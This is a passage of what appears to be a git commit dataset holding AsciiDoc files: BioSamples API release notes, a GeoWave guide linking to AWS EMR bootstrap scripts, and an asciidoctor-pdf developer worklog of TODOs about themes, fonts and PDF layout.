use specific URLs but rather follow relationships\nbetween API endpoints, much like a user would use links between HTML\npages. It is similar to the `\/biosamples\/api`\u00a0JSON format, with a few\ncritical differences:\n\n* added __release__\u00a0in full\u00a0ISO 8601 format including time. The\nbackwards-compatible\u00a0__releaseDate__ exists but should be considered\ndeprecated and will be removed in a future release.\n* added\u00a0__update__\u00a0in full\u00a0ISO 8601\u00a0format including time.\nThe\u00a0backwards-compatible\u00a0__updateDate__ exists but should be considered\ndeprecated and will be removed in a future release.\n* removed\u00a0__description__\u00a0as a separate field, is now available as\na\u00a0__characteristic__.\u00a0\n* remove\u00a0**relations**\u00a0rel link; equivalent information is now embedded\nin sample in __relationships__\u00a0and\u00a0__externalReferences__\u00a0lists.\n* remove\u00a0**sample**\u00a0rel link; with relations now embedded, this link\nserves no purpose.\n* added\u00a0**curationLinks**\u00a0rel link.\n* ordering may be different.\n* fields are not displayed if empty or null.\n* characteristic names accurately reflect what was submitted and may now\nbe multiple words and may include non alphanumeric characters (e.g\nbrackets, greek letters, etc). In the `\/biosamples\/api` responses\ncharacteristic names were always camelCased and with non-alphanumeric\ncharacters removed.\n* external references directly embedded in the samples and the groups.\n\n[[xmlbiosamplesxml]]\nXML\u00a0`\/biosamples\/xml`\n~~~~~~~~~~~~~~~~~~~~~\n\nWe are maintaining this for backwards compatibility. Later in 2018 we\nwill be consulting about future development of this API, particularly in\nthe context of the improved JSON `\/biosamples` API using content\nnegotiation and several long-standing issues with limitations arising\nfrom the XML schema in use.\n\n* XML element *TermSourceREF* element *Name* and element *URI* are\nremoved.\n* XML element *Property* attributes characteristic and comment always\nfalse.\n* elements and attributes may be in different order.\n* allows only one IRI on attributes, so in rare cases of multiple IRIs\nwill not be complete.\n* Query parameter `query` has now a default value of * if none is\nprovided.\n* Query parameter `sort` is ignored for the search, due to undefined\nbehaviour and lack of usage.\n\n[[json-biosamplesapi]]\nJSON `\/biosamples\/api`\n~~~~~~~~~~~~~~~~~~~~~~\n\nThis API should be considered **deprecated**\u00a0and we will aim to remove\nit by 2019. Any users of this should move to using the `\/biosamples`\nURIs to retrieve JSON representations with an improved schema via\ncontent negotiation. Further announcements will be made in future for\nspecific updates and deadlines.\n\n* ordering may be different from previous versions, and is not\nguaranteed for future versions.\n* fields are not displayed if empty or null.\n* `\/api\/externallinksrelations\/{id}\/sample` and\n`\/api\/externallinksrelations\/{id}\/group` are removed due to lack of\nusage.\n* fixed _externalReferences_ and _publications_ to be nested objects and\nnot JSON strings.\n\n[[acknowledgements]]\nAcknowledgements\n~~~~~~~~~~~~~~~~\n\nThis release has been made possible with the support of our funders:\n\n* EMBL-EBI Core Funds\n* EC -ELIXIR-EXCELERATE \n* WT- HIPSCI\n* IMI - EBiSC\n* ELIXIR \u2013 Meta Data Implementation Study \n* WT-GA4GH\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef81a522556f724113e36be494b1308a4c570f18","subject":"changed wording on links (#1362)","message":"changed wording on links (#1362)\n\n","repos":"ngageoint\/geowave,spohnan\/geowave,ngageoint\/geowave,ngageoint\/geowave,spohnan\/geowave,locationtech\/geowave,spohnan\/geowave,locationtech\/geowave,locationtech\/geowave,ngageoint\/geowave","old_file":"docs\/content\/aws-env\/007-quickstart-guide-scripts.adoc","new_file":"docs\/content\/aws-env\/007-quickstart-guide-scripts.adoc","new_contents":"[[quickstart-guide-intro]]\n<<<\n\n:linkattrs:\n\n=== Bootstrap Scripts\n\n[[quickstart-guide-intro]]\nGeoWave currently supports the use of either Accumulo or HBase, so the version of the bootstrap script you \nuse when setting up your cluster will be dependent upon which system you want to use as your datastore. The bootstrap scripts help to set up geowave and your environment. Click on any of the links below to download the script.\n\n- For Accumulo use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/accumulo\/bootstrap-geowave.sh[s3:\/\/geowave\/latest\/scripts\/emr\/accumulo\/bootstrap-geowave.sh]\n- For HBase use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/hbase\/bootstrap-geowave.sh[s3:\/\/geowave\/latest\/scripts\/emr\/hbase\/bootstrap-geowave.sh]\n\nThese scripts will provide you with everything necessary to complete this guide, but will also set up Geowave if you would like to use it in other workflows. There are scripts available for each of the releases of Geowave going back to 0.9.3. These can be used by replacing ``\/latest\/`` with the desired release (i.e. ``\/0.9.3\/``) \n\n[NOTE]\n====\nWe have also provided quickstart scripts that will perform all of the steps in this guide automatically. This will allow you to verify your own steps, or test out other geowave commands and features on an already conditioned data set.\n\nIf you would prefer to have all of the steps run automatically, please use these bootstrap scripts instead of the \nones listed previously:\n\n- For Accumulo use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/accumulo\/bootstrap-geowave.sh[s3:\/\/geowave\/latest\/scripts\/emr\/quickstart\/accumulo\/bootstrap-geowave.sh]\n- For HBase use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/hbase\/bootstrap-geowave.sh[s3:\/\/geowave\/latest\/scripts\/emr\/quickstart\/hbase\/bootstrap-geowave.sh]\n====\n\nTo use one of the scripts listed above, it must be accessible from an s3 bucket. Because buckets are region specific, you may not be able to use our geowave bucket if your cluster is not deployed in the us-east-1 region. In this case, you will need a personal bucket in your region that contains the desired script. Instructions on <<110-appendices.adoc#create-aws-s3-bucket, creating>> and <<110-appendices.adoc#upload-to-aws-s3-bucket, uploading>> to an s3 bucket can be found in the appendices.\n","old_contents":"[[quickstart-guide-intro]]\n<<<\n\n:linkattrs:\n\n=== Bootstrap Scripts\n\n[[quickstart-guide-intro]]\nGeoWave currently supports the use of either Accumulo or HBase, so the version of the bootstrap script you \nuse when setting up your cluster will be dependent upon which system you want to use as your datastore. The bootstrap scripts help to set up geowave and your environment. Click on any of the links below to download the script.\n\n- For Accumulo use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/accumulo\/bootstrap-geowave.sh[http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/accumulo\/bootstrap-geowave.sh, window=\"_blank\"]\n- For HBase use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/hbase\/bootstrap-geowave.sh[http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/hbase\/bootstrap-geowave.sh, window=\"_blank\"]\n\nThese scripts will provide you with everything necessary to complete this guide, but will also set up Geowave if you would like to use it in other workflows. There are scripts available for each of the releases of Geowave going back to 0.9.3. These can be used by replacing ``\/latest\/`` with the desired release (i.e. ``\/0.9.3\/``) \n\n[NOTE]\n====\nWe have also provided quickstart scripts that will perform all of the steps in this guide automatically. This will allow you to verify your own steps, or test out other geowave commands and features on an already conditioned data set.\n\nIf you would prefer to have all of the steps run automatically, please use these bootstrap scripts instead of the \nones listed previously:\n\n- For Accumulo use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/accumulo\/bootstrap-geowave.sh[http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/accumulo\/bootstrap-geowave.sh, window=\"_blank\"]\n- For HBase use: link:http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/hbase\/bootstrap-geowave.sh[http:\/\/s3.amazonaws.com\/geowave\/latest\/scripts\/emr\/quickstart\/hbase\/bootstrap-geowave.sh, window=\"_blank\"]\n====\n\nTo use one of the scripts listed above, it must be accessible from an s3 bucket. Because buckets are region specific, you may not be able to use our geowave bucket if your cluster is not deployed in the us-east-1 region. In this case, you will need a personal bucket in your region that contains the desired script. Instructions on <<110-appendices.adoc#create-aws-s3-bucket, creating>> and <<110-appendices.adoc#upload-to-aws-s3-bucket, uploading>> to an s3 bucket can be found in the appendices.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2255f66cd13f72c24037a247e773e3d15a613a7","subject":"update WORKLOG","message":"update WORKLOG\n","repos":"mojavelinux\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf","old_file":"WORKLOG.adoc","new_file":"WORKLOG.adoc","new_contents":"= WORKLOG\n\n* use Groovy language specification as case study to find corner cases\n - perhaps progit2 as well; others?\n\n== TODO\n\n* backport resize method from prawn-svg and use it in converter (now in two places)\n* document fit attribute for images in running content in theming guide (or README)\n* rework resolve_image_path API so it's more logical; override based on type of first argument; document as option\n* rename inherited_align to text_align? (and base_align to base_text_align?)\n* rename text-alignment attribute to text-align? (change is within alpha.14, so still a chance to change)\n\n* implement index of index terms (#386)\n - introduce model object\n* don't crash if image in running content is an unsupported format\n* support image URL (using resolve_image_path) in running content (what about data-uri?)\n* numbering for appendix subsections is not correct; should be A.1, A.2 (#627)\n - seems like an issue in core too\n* BUG: implicit width of inline image (SVG only?) calculated incorrectly (see sandbox\/issue-494)\n* BUG: http:\/\/asciidoctor.org[Asciidoctor] surrounded by smart quotes doesn't get translated to a link (as it should)\n* FILE ISSUE draw border for quote\/verse block on right if text is aligned to the right\n* Prawn should not move cursor before placing image if image exceeds height of bounding box\n - workaround now by overriding move_text_position\n* part title \/ number (#597)\n - upper roman numeral\n - add part-label, fallback to Part (e.g., Part I)\n - only use roman numeral in toc\n* support equal column widths in header\/footer as \"columns: 3*\" (with optional leading alignment)\n* support padding for each column in running header\/footer\n* should we move files under asciidoctor\/pdf and use asciidoctor-pdf as the alias?\n* consider moving RomanNumeral into a gem named roman_numeral\n* should vertical alignment of admonition icon\/label should respect padding on content? have it's own padding?\n* allow general settings for admonition icon to be set using admonition_icon key prefix (e.g., admonition_icon_size)\n* allow alignment to be set on discrete heading using role\n* SIMPLE: submit pastie theme for Rouge upstream\n* SIMPLE: document autofit option on verbatim blocks (in README?)\n* SIMPLE: fill in missing defaults in theming guide\n - title_page\n - toc\n - table_header_cell\n - admonition_icon_<name>_stroke_color\n - description_list_term_font_style\n - header\/footer\n* SIMPLE: mark required keys (assume keys are optional by default)\n - required keys can never have a null value; most are set by base theme\n* SIMPLE: document vw\/vh measurement units in theming guide (make it clear it only applies in certain cases)\n* SIMPLE: in theming guide, recommend not using the fallback font when working with very large documents\n - explain that default theme uses a fallback font\n* allow font properties to be set for normal paragraph separate from base (need to think about inheritence)\n* allow alignment of list to be set separately from base align (and perhaps a hint in document) (#182)\n* FIXME: stop using fallback fonts in default theme (instead, bundle a fuller font)\n - using fallback fonts significantly slows down Prawn because it checks every letter every time (see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/lib\/prawn\/text\/formatted\/box.rb#L427-L434)\n - add broader character range to monospace font so we can drop fallback font by default (#282)\n - consider having a fallback for prose and fallback for literal\n* SIMPLE: recommend use of prawn-gmagick in README\n - https:\/\/github.com\/packetmonkey\/prawn-gmagick\n - must install GraphicsMagick-devel on Fedora\n - or use ImageMagick (or GraphicsMagick) to uncompress PNG images before reading them\n* use <a id=\"\"><\/a> instead of <a name=\"\"><\/a> for anchor point in formatted text\n - benchmark to see if it's faster to use empty or non-empty element in parser\n* text decoration should be supported as part of theme_font\n* QUESTION: should we set pdf-anchor attribute on every node that has an id?\n - isn't it required for cross references to work?\n* QUESTION should preface subsection be numbered? (although it is numbered in DocBook and dblatex)\n* new design for keep together; necessary to get exact height accounting for gaps at page breaks\n . in dry run, set to stop when advancing to next page (override on_page_create to throw exception)\n . if less than one page, return calculation (similar to what we do now)\n . if greater than one page, clear on_page_create; move to y offset of original and start dry run again; fix calculation\n . (if not keeping together, we can skip 1 and 2)\n* rename \"convert_content_for_\" since it can collide with existing blocks\n* don't orphan block title (make sure anchor stays with start of block)\n* QUESTION should we report full image path of gif in warning message when prawn-gmagick is not available?\n* QUESTION should we add destination to top of imported PDF page?\n - import page should accept id as section, optional argument\n* leading (line height) isn't applied when content is split across pages\n* generate fonts without PS Glyph Names to reduce file size\n - create script that can generate fonts entirely from original font source\n* if start_new_page is called at end of layout_chapter_title, and media=prepress, ghostscript reports an error\n - problem is no color space is set; can fix by calling update_colors before advancing to recto page in start_new_chapter\n - maybe introduce a skip_page helper to combine these operations?\n - upstream issues: https:\/\/github.com\/prawnpdf\/prawn\/issues\/951 and https:\/\/github.com\/prawnpdf\/prawn\/issues\/473\n* document how to test \/ use a PR\n - see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/462#issuecomment-246200953\n - clearer instructions for how to test local development version (using rake install)\n* break printed URIs at each forward slash (and perhaps at ? and & too) (#563)\n* allow font size of dot_leader to be specified (some risk if it exceeds size of entries)\n* add empty? method to Page (instead of page_empty? on document)\n* FILE ISSUE: add option to svg method to not move cursor (in prawn-svg)\n* FILE ISSUE: in prawn: go_to_page should accept second argument that is cursor position\n* UNRESOLVED: dry_run should start at cursor of main document (or as option); total height calculation would need to be revised\n - box_height isn't currently accurate when it spans more than one page\n - this should fix height calculation when content is split over a page break (leaving small amount of excess)\n - however, if cursor is advanced to fit content on page, then that excess will cause box_height to be too large\n - life would be simpler if Prawn allowed us to draw graphics at bottom layer\n* support pdfwidth for inline image (#620)\n* allow height of inline image to be set to line height (perhaps 1em?)\n* space around inline anchors\/index entries doesn't get collapsed by text formatter\n* add support for format attribute on image macro to image-related attributes such as title-page-background-image\n - support explicit image format for cover page image and page background image\n* introduce abstract-title attribute to complement preface-title?\n* need some sort of post_construct method for converter that receives document\n - inline convert methods can get called before init_pdf\n - monkeypatch?\n* document nonfacing option more clearly (in README or theming guide)\n* create document that explains how built-in fonts are generated and what subsets are selected\n - I need instructions for myself so I know how to update\/modify the fonts\n - document in theming guide what must be done to prepare fonts (old-style 'kern' table, optionally subset) (file issue!)\n - add note to README that Prawn will subset any fonts provided\n* consider supporting icon tag in parser to simplify how inline icons are stored; simpler use of passthrough content\n* cache stateless cell data resolved from theme (don't need to recalc each time; at least per table)\n* FILE ISSUE: autowidth on table doesn't work for multi-line content (prawn-table bases width calculation on normalized value)\n - table ends up being stretched even though it doesn't need to be\n* table logic: does the layout_table_caption have to be inside the table block? can we pre-calculate the actual width for the caption? does the table offer a callback we can use to keep the caption on the same page as the table?\n* introduce object to store\/organize running content data and specs\n* QUESTION: should theme font handle hierarchical keys (either explicitly or implicitly)\n* need to support .canvas role on image so it isn't shrunk to fit inside top\/bottom margins\n - perhaps .canvas, .canvas-x, .canvas-y\n - allow image to span width of page (role=canvas, role=canvas-x or role=canvas-y); if role is canvas or canvas-y, then it does not consume height\n - partially addressed by vw units\n* FILE ISSUE: when split source listing, add top padding to bounding box (or is it the line metrics top?)\n - perhaps this has to do with the a miscalculation in dry run when not starting from same y position?\n - separate theme control for listing vs literal block (and maybe source too)\n* should we print alt text if an error is caught when attempting to embed an image?\n* stroke and fill multi-page sidebar block (#259) and example block (#362)\n* support URL images in running content (need to delegate to resolve_image_path)\n* rewrite optimize-pdf using rghost (#535) (also see #21 and #22)\n - add Optimizer class; wire to cli (separate issue?)\n* add feature to number bullets according to section number (needed for OpenDevise agreements)\n* outline should link to title page if there's a cover page (skip cover page and ensuing blank page)\n* might be better to organize fragments of source chunks by lines (and pass that around) to simplify post-processing\n* support negative start value for list (#498)\n - need to count negative numbers in correct direction\n* support zero-leading integers (use dedicated type like w\/ roman numerals) in reversed order lists\n* margins\/paddings at page boundaries are strange, fragile\n* implement margin collapsing (between blocks)\n - would eliminate need for negative padding for blockquote\n* bw theme for CodeRay (or Rouge) to match output of Pygments bw\n* the nested? method on list isn't checking if nested inside a block inside a list\n - need an example\n* wrapped lines in source listing should be indented to account for line number gutter (#504)\n* add sample SVG to content of chronicles-example.adoc (we do already use one for title page)\n* inline images: allow built-in font family names for SVG to be remapped\n* inline images: should we be passing absolute image path in tag or something relative (or even a lookup id?)?\n* large image runs into running footer (doesn't bottom margin need to be aligned with running footer height?)\n* should str_to_pt helper handle % and vw units?\n* allow format of printed link to be controlled by theme (similar to what we do in the manpage converter)\n* FILE ISSUE: should not wrap at formatting mark unless it's at a break opportunity\n - the problem here is that Prawn is allowing breaks at the boundaries of text fragments; it should only look at the contents\n* allow top as alternative to margin_top for all elements on title page (#431)\n* swallowing exceptions! (any use of e.message in a string is dangerous)\n* allow ordered list marker to be prefixed by section number (a global setting?)\n* conum not aligned vertically with callout text (perhaps too small?)\n* conum should never wrap (push it into the text if necessary)\n* decouple theme settings for section titles and discrete headings\n* decouple listing\/literal\/source theme settings; currently all under code\n* replace explicit char ranges with classes in regexp (e.g., [[:word:]] or \\w)\n* devise a way to specify a value as a string literal (variable replacement only) in theme\n* apply calculated theme values after loading?\n* allow \"content\" in place of recto_content & verso_content for running header\/footer\n - still relevant after restructuring?\n* be more specific in theming guide as to where prose_margin_top and prose_margin_bottom apply\n* allow valign value to be a number (requires change to Prawn)\n* layout SVG without using keep_together (since we know all the dimensions)\n - fix SVG to a single page (check height + caption height)\n* allow background color to be set for chapter \/ heading\n* allow border to be set around block image\n* file issue in prawn to dispatch to image handler for images it doesn't know about\n* add brief mention in theming guide that deeper customizations can be achieved by extending the converter\n - see sandbox\/asciidoctor_pdf_extensions.rb\n - reference infoq-minibook repo & blog post\n - document how to extend the converter, use Prawn\n - document how to override the Ruby code to get custom styling in the theming guide\n* is https:\/\/github.com\/packetmonkey\/prawn-pdfimage a safer way than prawn-templates to import PDF as image?\n* rename ThemeLoader to ThemeReader (or ThemeManager)?\n* normalize step leaves space after endline (i.e., `\\n `) at a hard line break (doesn't seem to affect flow)\n* *margin per heading level* (#176)\n* need a single object to hold complete font properties; different from font family\/style object\n* font method should support a single argument that's a font object or font hash\n - in general, the way font properties are set needs to be cleaned up\n* allow font size in theme to be specified in em or %\n - should multiply value being inherited\n* can't put margin top on chapter (chapter_top?) (#576)\n* convenience method to check if there's enough room for another line on page\n* allow dynamic background image with page number in path\n* running header\/footer covers content (perhaps just a limitation that needs to be documented)\n* document that palette-based transparent in PNGs is not supported in older version of Prawn\n* FILE ISSUE: for prawn to preserve space (even w\/ guards, spaces don't preserve over wrapped lines)\n - if this is fixed, we can remove all the guard indent code\n* FILE ISSUE: for prawn to support spacer fragments with fixed width \/ height and no text (or text is ignored in calculations)\n - needed for arranging inline objects\n* document limitations in README (such as no linear gradients in SVG, etc)\n* document all permutations of image sizing\n* set vposition on title page logo image explicitly to avoid page overrun?\n* verse has problems with wrapping if line is long (in what way?)\n* allow default kerning to be set using theme\n* keep line comment in front of callout number to aid copying?\n* rework pull request for source line numbers (combine with restore conum logic if conums are enabled)\n - also combine with the preserve_space logic\n* allow front cover and back cover image to be defined in theme as fallback; document in theming-guide\n* should we shorten the keys to front-cover and back-cover (since image is implied?)\n* keep caption with table (check for sufficient space); only for top placement since bottom placement is much harder\n* allow valign to be set on image block (vertical center in page for things like slides)\n* allow title page image \"bottom\" to be set instead of \"top\" (mutually exclusive)\n* rtl (see .\/sandbox\/rtl\/ folder)\n* pass macro doesn't work in source block when macro subs and highlighting are both enabled (#180)\n* enable cache_images option for prawn-svg (#223)\n* bind image_registry between scratch and main document so we don't process the same image more than once\n - need to do some testing\n* show SVG warnings if debug (or trace) is on\n* clean temporary files once per conversion instead of per node? (file issue)\n* title is being rendered 3 times (maybe one for scratch?); explain why in comments if normal\n - block title?\n* continue working on json schema for theme; try to generate keys section from it\n* rethink how we're handling line heights for fonts, then document carefully\n - look closer at line_height and line_height_length and see if we need to document other details\n - allow line height to be set in more places (such as the prose for admonition, example, sidebar, etc)\n* implement first-line indent for paragraphs (seems like conflict w\/ our text formatter)\n - option to not indent first paragraph in section\n - add indent\/noindent options\n - if you indent, perhaps drop the margin between paragraphs?\n* add entry to TOC for preamble\/preface\n* can we create fragments directly in converter instead of using the formatted text parser?\n - would need to override how blocks join content; perhaps even how apply_subs works\n* don't issue warnings on scratch document\n - perhaps introduce a helper method to abstract this away\n* getting a line wrap break before comma if preceding word is emphasized (problem in Prawn wrapping)\n - no longer a problem? perhaps was due to #462; could also be when it does wrap by char\n* toc\n - make dot leader style separate from title \/ number\n* running content\n - side margins (allow override, default to content margins)\n - numbered and unnumbered chapter and section titles (file issue)\n - chapter and section number (easily solved by previous)\n - separate running content for chapter page (by default uses normal content)\n* should we rename base_ to body_ to make it more familiar to CSS developers?\n* support !include in theme file (#571)\n* add cover page example to chronicles so people see how to use it\n - need to find a good cover page\n* don't orphan a single line of paragraph (send it with a buddy line)\n - implement orphan sentences for paragraph\n* implement stem support\n - see asciidoctor-mathematical and asciidoctor-mathoid\n* fail gracefully if theme file cannot be found\n - report it can't be found (should we fallback to default theme?)\n* expose theme variable on document (using attr_reader?)\n* dedicated style for top\/bottom margin of outline list\n - allow margin top and bottom to be set for lists (applies to outer-most list)\n - allow spacing between nested lists levels be configured in theme\n* need dedicated theme styles for paragraph spacings, etc\n* subtitles for parts and chapters (#623)\n* part titles need their own styling\n* add color calculation functions in theme file (like in SASS)\n* create utility method to get % offset of page as y value (option to constrain to bounds)\n* document why we have converter assignment in convert_content_for_block method\n - do we still need the converter hack in convert_content_for_block? (seems to be needed for admonitions)\n* support transparency for colors (this is now supported by resolve_theme_color)\n - utility to coerce the color value transparent to nil (better handling in general)\n* support generic color (or value) attribute in formatted text parser instead of specific color systems (rgb, cmyk)\n* **allow theme_font to set line_height** (honor this setting from document)\n - theme setting for code line height (currently using base_line_height)\n* should we put an entry for doctitle in the outline if notitle is set? (need to test these edge cases)\n* add more theme control over toc (per-level font size, style, color, etc)\n* strip formatted text (e.g., monospace) from headings and toc entries\n* prevent title-logo-image from spilling to next page (same with title content)\n* document what each keep_together is doing \/ expects\n - keep_together really needs to pick up the inherited horizontal bounds or else measurement is inaccurate; fixed?\n* code cleanups (regexps to constants, nil? checks and such)\n - split prawn_ext\/extensions into individual files based on function\n* enable line above (or below?) title on title page (file issue)\n - perhaps 4-sided border?\n* enable text transform for:\n - running content\n - admonition content\n - table foot row\n - table header cell\n - table (overall)\n - generic paragraph?\n - inline literal text\n - inline link\n - inline literal\/monospaced\n - listing\/literal\/source block\n - global default\n* file upstream issue for Prawn to warn if it can't resolve a glpyh (or monkeypatch it)\n* support web fonts; use uri-cache to avoid redundant fetching\n* align caption to match alignment of block image\n* FILE ISSUE: attribute or role to control table shading (all, even, odd) (or call it striped like bootstrap?)\n - e.g., [.striped]\n - currently controlled by theme\n* make conum glyphs configurable in theme (use reference table to resolve)\n* CJK and\/or multilingual support (see https:\/\/github.com\/chloerei\/asciidoctor-pdf-cjk)\n* description list term should keep together with content (file issue)\n* allow font properties to be set for lists (description_list, outline_list)\n* hardbreak in table cell results in extra endline (likely not normalizing cell content)\n* remove pdfmarks file after optimizing\n* look into single_line + shrink_to_fit in listings, perhaps other places\n* refactor as Prawn view to avoid method name conflicts (also see https:\/\/github.com\/prawnpdf\/prawn\/issues\/802)\n* create proper default (Asciidoctor) theme (#60)\n* document how the treetop parser is rebuilt\n* rework font so we can set actual height, calculate x_height internally (use 1em for spacings)\n* padding top and bottom on content affects height_of calculations (need to review)\n* code font needs to support more than just ascii (Golo license block is an example)\n* don't cutoff content in partintro\n* admonition styles are one big hack; need to be organized and based on theme\n* BUG: autofit logic not working with Courier (still overrunning line)\n* honor safe mode rules\n* print scratch.pdf file if verbose \/ trace mode is on in Asciidoctor\n* introduce setting to indent section content\n* rename default theme to docbook theme, make default the Asciidoctor theme (should we have a base theme?)\n* allow relative font size for inline code to be set (perhaps a percentage or em value? there are problems with this in arranger)\n* apply line height metrics for table content\n - figure out how to adjust line height for monospaced cell content\n - figure out how to layout regular cell content to adjust for line height\n* document the typeset_text methods very clearly\n* move check for node.title? inside layout_caption\n* theme idea \/ tester: see sandbox\/ebook-learn_version_control_with_git-SAMPLE.pdf\n* make alternating page title position optional (via theme?)\n* fix passthrough placeholders that get caught up in syntax highlighting (see https:\/\/github.com\/asciidoctor\/asciidoctor\/blob\/master\/test\/blocks_test.rb#L2258-L2277)\n* FILE ISSUE list Preamble in TOC\n - perhaps only if it has a title? or should we use a default title if one isn't specified?\n* honor font defs in SVG (to get M+ 1p); prawn-svg supports loading fonts; need to pass fonts to prawn-svg\n* should we support % as a unit in theme (divides by 100 and sets float value)?\n* disable monospace font color (and family?) in headings\n* add source language to upper-left corner of listing block\n* implement quote style from default Asciidoctor stylesheet\n* reorganize Prawn extensions (see prawn-table for example)\n* rename \"theme\" to \"style\"?\n* restrict custom theme path to jail (or load from load_path)\n* enforce jail on SVG option enable_file_requests_with_root\n* implement convert_toc\n* italic text in a line of text styled as bold in the theme loses its bold style\n* introduce method for start_initial_page?\n* make outline a document option (perhaps \"outline\" like \"toc\")\n* add bench\/ directory for the script to test the speed of the formatted text parser\n* start page numbering on page 1 (use \/PageLabels reference to make i the title page number)\n - add this feature upstream to Prawn\n* *report image only page w\/ stamps corruption issue to Prawn*\n - still true?\n* add \/PageMode \/UseOutlines\n* cli arguments\n - theme (pdf-style, pdf-stylesdir)\n - enable\/disable writing pdfmark file\n - optimize-pdf\n* implement footnotes correctly (#73, #85)\n* flesh out outline more (in what way?)\n* flesh out title page more\n - document subtitle (partially solved)\n* don't create title page for article doctype (#95, #105)\n - only create title page if doctype=book\n* allow character spacing to be controlled by theme\n* might be able to avoid dry run for listing\/literal in obvious cases; engineering estimate\n* allow pdf-page-margin to be set in document\n - this is slighly more complicated now that we have mirror margins; perhaps can't set those from document?\n* use `module Asciidoctor; module PDF; module FormattedText` convention to simplify indentation\n* introduce code style guide (like in Jekyll AsciiDoc); perhaps make this a shared file in the Asciidoctor ecosystem?\n* I'd like for theme to be able to set font scan path for Prawn SVG, but registry is global\n* rename dot_leader to just leader or tab_leader?\n* rename align to text_align?\n* QUESTION should bullets be on right if list alignment is right (what about center?)\n* QUESTION should we resolve font-based icons globally, in init_pdf?\n\n* use treetop to parse and evaluate theme file\n* use or don't use pad method? check performance\n* switch wolpertinger to howling grasshopper mouse\n\n== Major Efforts \/ Milestones\n\n* add a test suite\n* refactor as Prawn View\n* add support for AsciiDoc table cell content by writing custom Table::Cell implementation\n* add support for nested tables by writing custom Table::Cell implementation\n* add support for footnotes (as article or chapter endnotes)\n* rework text handling in Prawn to support line height natively\n* margin collapsing (like CSS)\n\n== Documentation\n\n* \"Incorrect number of arguments in 'SCN' command\" happens when you add a stamp to an imported page\n* be mindful that layout_prose adds margin to bottom of content by default (important when working in a bounding box)\n* ttfunk does not support ligatures (e.g., fi -> \ufb01); we could do this manually in post_replacements\n\n== Notes\n\n* when using `single_line: true` on formatted_text, it's necessary to reapply our padding top\/bottom from line metrics\n* we always leave cursor on start of page we're about to write on; certain checks rely on this fact\n* \"section title\" is the semantic element; \"heading\" is the structural element\n* \/PageLabels\/Nums must have entry for every page in front matter, even if a blank page\n - in fact, must account for every page or else numbering lags behind when scrolling document\n* if we set the vposition on image to a numeric value, it skips the overrun check that happens internally\n* any instance variables referenced by converter methods for inline nodes could get accessed before the converter for document is called\n* Evince throws warning when printing PDF if & is used in document title; but this is valid according to the PDF specification\n* Prawn drops fragments with empty text (hence the need to use zero-width space)\n - analyze_glyphs_for_fallback_font_support drops fragments with empty text\n - later on, initialize_wrap drops fragment with empty text\n* use term \"page number label\" to refer to the visible, printed page number (not the implicit page number)\n* vertical alignment of text doesn't work properly in Prawn; better to calculate alignment manually, if possible\n\n== Known Issues\n\n* inline image at start of the line is slighly shifted to the right due to the fact that it's placed in the center of the reserved fragment width; perhaps we are adding this padding\n\n== Potential Optimizations\n\n* if autofit is set on a listing\/literal block that has conums, we are splitting fragments by line twice\n* comparing > 0 is slightly faster than == 0 (for cases when we can swap the logic)\n\n== Usage Optimizations\n\n* uncompress PNG files to avoid slow zlib inflating step in Prawn\n* flatten PNGs (remove alpha channel) since it messes up font rendering on the page in Adobe Acrobat Reader (need to verify)\n* avoid the fallback font if possible (use full fonts in your theme) because it checks for *every* glyph\n* font families used in SVGs must match keys in the font catalog\n\n== Open Questions\n\n== Implementation\n\n* should we read SVG file using UTF-8 encoding; or does REXML handle encoding?\n* can we leverage before_rendering_page callback on table?\n* should we use move_past_bottom in some places instead of start_new_page?\n\n=== Design\n\n* remove\/reduce padding above heading when it appears at the start of a page?\n* Default line height?\n* Should the heading sizes be calculated according to the default font size?\n* Page margins\n* Body indentation?\n - recto \/ verso indentation?\n* Size of masthead \/ footer\n* Line separating masthead \/ footer?\n* Separate title page\n* Start chapter on new page?\n* Special layout for chapter page?\n\n=== Theme\n\n* keep or drop base_ prefix in theme? I think we should keep it because it provides context elsewhere in the document (e.g. $base_font_size vs $font_size)\n\n== Resources\n\n* https:\/\/code.google.com\/p\/origami-pdf\/[Origami PDF: A PDF inspection library]\n* https:\/\/github.com\/a1ee9b\/PrintPretty[A theme for PDF designed for printing]\n* http:\/\/randomtextgenerator.com[Random Text Generator, supports multiple languages]\n* http:\/\/clagnut.com\/blog\/2380[List of pangrams]\n - http:\/\/www.camcc.org\/_media\/reading-group\/qianziwen-en.pdf[1,000 character classic (Chinese)]\n* pdf2svg can convert the PDF file into an SVG (one SVG per page)\n* https:\/\/blog.codeship.com\/build-math-evaluation-engine[How to Build a Simple Math Evaluation Engine]\n* http:\/\/blog.typekit.com\/2011\/11\/03\/optimizing-fonts-for-the-web-unicode-values-glyph-set-underlines-and-strike-through\/[Optimizing Fonts for the Web]\n","old_contents":"= WORKLOG\n\n* use Groovy language specification as case study to find corner cases\n - perhaps progit2 as well; others?\n\n== TODO\n\n* remove support for link_color option in layout_prose as this is now handled by text formatter\n* BUG: implicit width of inline image (SVG only?) calculated incorrectly (see sandbox\/issue-494)\n* FILE ISSUE: SIMPLE: use docdate attribute instead of Time.now to set modification date on document\n* SIMPLE: fill in missing defaults in theming guide\n - title_page\n - toc\n - table_header_cell\n - 